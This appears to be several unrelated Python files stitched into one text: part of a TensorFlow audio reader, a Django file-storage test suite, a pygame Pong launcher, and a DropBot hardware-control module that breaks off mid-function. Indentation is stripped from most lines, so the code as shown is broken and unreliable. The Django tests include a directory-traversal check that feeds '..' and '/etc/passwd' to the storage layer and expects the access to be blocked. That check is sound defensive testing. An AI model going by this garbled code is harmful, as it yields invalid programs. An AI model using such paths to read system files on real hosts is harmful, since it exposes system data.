            self.gc_queue = tf.queue.PaddingFIFOQueue(queue_size, ['int32'],
                                                      shapes=[()])
self.gc_enqueue = self.gc_queue.enqueue([self.id_placeholder])
# TODO Find a better way to check this.
# Checking inside the AudioReader's thread makes it hard to terminate
# the execution of the script, so we do it in the constructor for now.
files = find_files(audio_dir)
if not files:
raise ValueError("No audio files found in '{}'.".format(audio_dir))
if self.gc_enabled and not_all_have_id(files):
raise ValueError("Global conditioning is enabled, but file names "
"do not conform to pattern having id.")
        # Determine the number of mutually-exclusive categories we will
        # accommodate in our embedding table.
if self.gc_enabled:
_, self.gc_category_cardinality = get_category_cardinality(files)
# Add one to the largest index to get the number of categories,
# since tf.nn.embedding_lookup expects zero-indexing. This
# means one or more at the bottom correspond to unused entries
# in the embedding lookup table. But that's a small waste of memory
            # to keep the code simpler, and preserves correspondence between
# the id one specifies when generating, and the ids in the
# file names.
self.gc_category_cardinality += 1
print("Detected --gc_cardinality={}".format(
self.gc_category_cardinality))
else:
self.gc_category_cardinality = None
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
def dequeue_gc(self, num_elements):
return self.gc_queue.dequeue_many(num_elements)
def thread_main(self, sess):
stop = False
# Go through the dataset multiple times
while not stop:
iterator = load_generic_audio(self.audio_dir, self.sample_rate)
for audio, filename, category_id in iterator:
if self.coord.should_stop():
stop = True
break
if self.silence_threshold is not None:
# Remove silence
audio = trim_silence(audio[:, 0], self.silence_threshold)
audio = audio.reshape(-1, 1)
if audio.size == 0:
print("Warning: {} was ignored as it contains only "
"silence. Consider decreasing trim_silence "
"threshold, or adjust volume of the audio."
.format(filename))
audio = np.pad(audio, [[self.receptive_field, 0], [0, 0]],
'constant')
if self.sample_size:
# Cut samples into pieces of size receptive_field +
# sample_size with receptive_field overlap
while len(audio) > self.receptive_field:
piece = audio[:(self.receptive_field +
self.sample_size), :]
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: piece})
audio = audio[self.sample_size:, :]
if self.gc_enabled:
sess.run(self.gc_enqueue, feed_dict={
self.id_placeholder: category_id})
else:
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: audio})
if self.gc_enabled:
sess.run(self.gc_enqueue,
feed_dict={self.id_placeholder: category_id})
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
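
# A minimal usage sketch (not part of the original module). It assumes TF1-style
# graph execution (eager disabled) and a directory of audio files matching the
# find_files() pattern above; the hyper-parameter values are placeholders.
def _example_reader_usage(audio_dir, receptive_field=5117):
    tf.compat.v1.disable_eager_execution()
    coord = tf.train.Coordinator()
    reader = AudioReader(audio_dir,
                         coord,
                         sample_rate=16000,
                         gc_enabled=False,
                         receptive_field=receptive_field,
                         sample_size=100000,
                         silence_threshold=0.01)
    audio_batch = reader.dequeue(1)
    with tf.compat.v1.Session() as sess:
        reader.start_threads(sess)
        # Blocks until the background thread enqueues one padded example.
        batch = sess.run(audio_batch)
        coord.request_stop()
    return batch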
|
tests.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import errno
import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
import warnings
from datetime import datetime, timedelta
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation, SuspiciousOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.utils import six
from django.utils._os import upath
from django.utils.six.moves.urllib.request import urlopen
from .models import Storage, temp_storage, temp_storage_location
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
        get_storage_class raises an error if the requested import doesn't exist.
"""
with six.assertRaisesRegex(self, ImportError, "No module named '?storage'?"):
get_storage_class('storage.NonExistingStorage')
def test_get_nonexisting_storage_class(self):
"""
        get_storage_class raises an error if the requested class doesn't exist.
"""
self.assertRaises(ImportError, get_storage_class,
'django.core.files.storage.NonExistingStorage')
def test_get_nonexisting_storage_module(self):
"""
        get_storage_class raises an error if the requested module doesn't exist.
"""
# Error message may or may not be the fully qualified path.
with six.assertRaisesRegex(self, ImportError,
"No module named '?(django.core.files.)?non_existing_storage'?"):
get_storage_class(
'django.core.files.non_existing_storage.NonExistingStorage')
class FileStorageDeconstructionTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, tuple())
self.assertEqual(kwargs, {'location': temp_storage_location})
kwargs_orig = {
'location': temp_storage_location,
'base_url': 'http://myfiles.example.com/'
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
class FileStorageTests(unittest.TestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir,
base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, upath(os.getcwd()))
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def test_file_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
atime = self.storage.accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(
os.path.getatime(self.storage.path(f_name))))
self.assertLess(datetime.now() - self.storage.accessed_time(f_name), timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_created_time(self):
"""
File storage returns a Datetime object for the creation time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
ctime = self.storage.created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(
os.path.getctime(self.storage.path(f_name))))
self.assertLess(datetime.now() - self.storage.created_time(f_name), timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_modified_time(self):
"""
File storage returns a Datetime object for the last modified time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
mtime = self.storage.modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(
os.path.getmtime(self.storage.path(f_name))))
self.assertLess(datetime.now() - self.storage.modified_time(f_name), timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file',
ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
file.write(b'1')
file.seek(0)
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(six.StringIO('1'), '', 'test',
'text/plain', 1, 'utf8')
with file:
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name),
os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'),
'%s%s' % (self.storage.base_url, 'test.file'))
# should encode special chars except ~!*()'
        # like the encodeURIComponent() JavaScript function does
self.assertEqual(self.storage.url(r"""~!*()'@#$%^&*abc`+ =.file"""),
"""/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file""")
# should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""),
"""/test_media_url/a/b/c.file""")
self.storage.base_url = None
self.assertRaises(ValueError, self.storage.url, 'test.file')
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(location=self.temp_dir,
base_url='/no_ending_slash')
self.assertEqual(
storage.url('test.file'),
'%s%s' % (storage.base_url, 'test.file')
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), {'storage_dir_1'})
self.assertEqual(set(files),
{'storage_test_1', 'storage_test_2'})
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
self.assertRaises(SuspiciousOperation, self.storage.exists, '..')
self.assertRaises(SuspiciousOperation, self.storage.exists, '/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case),
other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path)
raise OSError(errno.EEXIST, 'simulated EEXIST')
elif path == os.path.join(self.temp_dir, 'error'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file',
ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file',
ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Check that OSErrors aside from EEXIST are still raised.
self.assertRaises(OSError,
self.storage.save, 'error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise OSError(errno.ENOENT, 'simulated ENOENT')
elif path == os.path.join(self.temp_dir, 'error.file'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
            self.assertFalse(self.storage.exists('raced.file'))
# Check that OSErrors aside from ENOENT are still raised.
self.storage.save('error.file', ContentFile('delete with error'))
self.assertRaises(OSError, self.storage.delete, 'error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
        Test behavior when file.chunks() raises an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise IOError
f1.chunks = failing_chunks
with self.assertRaises(IOError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, 'PC_NAME_MAX')
except Exception:
return 255 # Should be safe on most backends
def test_files(self):
# Attempting to access a FileField from the class raises a descriptive
# error
self.assertRaises(AttributeError, lambda: Storage.normal)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
self.assertRaises(ValueError, lambda: obj1.normal.size)
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
six.assertRegex(self, obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
six.assertRegex(self, obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
six.assertRegex(self, names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
        # under the same name, then the filename gets truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = 'filename.ext'
for o in objs:
o.limited_length.save(filename, ContentFile('Same Content'))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], 'tests/%s' % filename)
six.assertRegex(self, names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = 'short.longext'
objs[0].limited_length.save(filename, ContentFile('Same Content'))
self.assertRaisesMessage(
SuspiciousFileOperation, 'Storage can not find an available filename',
objs[1].limited_length.save, *(filename, ContentFile('Same Content'))
)
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform.startswith('win'),
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a' # 4 chars for extension.
obj = Storage()
obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
self.assertEqual(obj.extended_length.read(), b'Same Content')
obj.extended_length.close()
def test_old_style_storage(self):
# Testing backward-compatibility with old-style storage backends that
# don't take ``max_length`` parameter in ``get_available_name()``
# and save(). A deprecation warning should be raised.
obj = Storage()
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter('always')
obj.old_style.save('deprecated_storage_test.txt', ContentFile('Same Content'))
self.assertEqual(len(warns), 2)
self.assertEqual(
str(warns[0].message),
'Backwards compatibility for storage backends without support for '
'the `max_length` argument in Storage.save() will be removed in '
'Django 1.10.'
)
self.assertEqual(
str(warns[1].message),
'Backwards compatibility for storage backends without support for '
'the `max_length` argument in Storage.get_available_name() will '
'be removed in Django 1.10.'
)
self.assertEqual(obj.old_style.name, 'tests/deprecated_storage_test.txt')
self.assertEqual(obj.old_style.read(), b'Same Content')
obj.old_style.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "./django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = six.StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super(ContentFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], 'conflict')
six.assertRegex(self, files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], 'test')
six.assertRegex(self, files[1], 'test_%s' % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], '.test')
six.assertRegex(self, files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
Test that ContentFile can be saved correctly with the filesystem storage,
        whether it was initialized with bytes or with unicode content."""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib2_urlopen(self):
"""
Test the File storage API with a file like object coming from urllib2.urlopen()
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
retropong.py
|
import threading
import pygame
import ball
import bar
import mainWindow
import randomball
import time
import os
from randomMusicplayer import WavPlayerRandom
from multiprocessing import Process
# Thread List
threads = []
BALLSPEED = 1
MUSIC_ON = True
SOUND_ON = True
PVP_CONTROL = True
COMPUTERONLYCONTROL = True
TIME_SINCE_GAME_START = time.time()
if __name__ == '__main__':
pygame.init()
soundObj = pygame.mixer.Sound(
os.path.abspath('ResourcesInUse/GameStart.wav'))
soundObj.play()
TIME_SINCE_GAME_START = time.time()
# Init the entities
bar1 = bar.bar([30, 30], 620, 480, 30, 120)
bar2 = bar.bar([620 - 60, 30], 620, 480, 30, 120)
ball = ball.ball([mainWindow.mainWindow.screenwidth / 2,
mainWindow.mainWindow.screenheight / 2], 620, 480, 10, 0)
randomball.randomBallEngine(ball)
main = mainWindow.mainWindow(bar1, bar2, ball)
main.createOne()
# Start the window thread inside the main thread -> The app is single-threaded for now
main.mainWindowLoop(PVP_CONTROL).start()
# Multi threading support
# x = threading.Thread(target=mainWindow.mainWindow.mainWindowLoop, args=(PVP_CONTROL,))
# threads.append(x)
# Start only the window thread - Cython blocks concurrency
# threads[0].start()
print("Game End\nHope you enjoy the game. Please check my github page: github.com/MatthewAlgo")
# End
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
|
__init__.py
|
import asyncio
import json
import threading
from threading import Thread
import numpy as np
import pydash as _
from si_prefix import si_format, si_parse
from dropbot import SerialProxy
from micropede.client import MicropedeClient, dump_stack
from micropede.async import MicropedeAsync
SCHEMA = {
"type": "object",
"properties": {
"voltage": {
"type": "number",
"default": 100,
"per_step": True
},
"frequency": {
"type": "number",
"default": 10000,
"per_step": False
},
"__hv_output_enabled__": {
"type": "boolean",
"default": False
},
"__hv_output_selected__": {
"type": "boolean",
"default": True
},
"__channel_count__": {
"type": "integer",
"default": 0
},
"__capacitance_update_interval_ms__": {
"type": "integer",
"default": 0,
"minimum": 0
},
"__target_capacitance__": {
"type": "number",
"default": 0
}
}
}
def setup_serial_proxy(self):
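    # A throwaway class serves as a mutable holder so the worker thread can hand the
    # SerialProxy (or the exception it hit) back to the caller once ready_event fires.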
class Y(object): pass
Y.control_board = None
Y.ready_event = threading.Event()
Y.err = False
def start_thread(x):
try:
x.control_board = SerialProxy()
except Exception as e:
x.err = e
x.ready_event.set()
t = Thread(target=start_thread, args=(Y,))
t.start()
Y.ready_event.wait()
if (Y.err):
raise(Y.err)
self.control_board = Y.control_board
APPNAME = "microdrop"
class DropBot(MicropedeClient):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
async def update_board_info(self):
info = {}
_.assign(info, json.loads(self.control_board.config.to_json()))
_.assign(info, json.loads(self.control_board.state.to_json()))
_.assign(info, json.loads(self.control_board.properties.to_json()))
_.assign(info, {"uuid": str(self.control_board.uuid)})
await self.set_state('info', info)
def listen(self):
setup_serial_proxy(self)
self.control_board.hv_output_enabled = True
self.control_board.hv_output_selected = True
self.on_put_msg("frequency", self.put_frequency)
self.on_put_msg("voltage", self.put_voltage)
self.on_trigger_msg("connect-dropbot", self.connect_dropbot)
self.on_trigger_msg("measure-capacitance", self.measure_capacitance)
self.on_trigger_msg("measure-voltage", self.measure_voltage)
self.on_trigger_msg("put-voltage-frequency", self.put_voltage_frequency)
self.on_state_msg("electrodes-model", "active-electrodes", self.turn_on_electrodes)
self.on_state_msg("electrodes-model", "voltage", self.change_voltage)
self.on_state_msg("electrodes-model", "frequency", self.change_frequency)
self.on_state_msg("dropbot-ui-plugin", "{key}", self.modify_status)
self.wait_for(self.update_board_info())
async def change_voltage(self, voltage, params):
try:
print("CHANGING :) VOLTAGE!!!")
# Convert payload from si_unit string to number
print("CALLING PSI PARSE:", voltage);
voltage = si_parse(_.replace(voltage, "V", ""))
print("ITS NOW: ", voltage)
await self.put_voltage({"voltage": voltage}, {})
await self.update_board_info()
except Exception as e:
print("Error setting voltage")
print(e)
async def change_frequency(self, frequency, params):
try:
print("FREQ", frequency)
frequency = si_parse(_.replace(frequency, "Hz", ""))
await self.put_frequency({"frequency": frequency}, params)
await self.update_board_info()
except Exception as e:
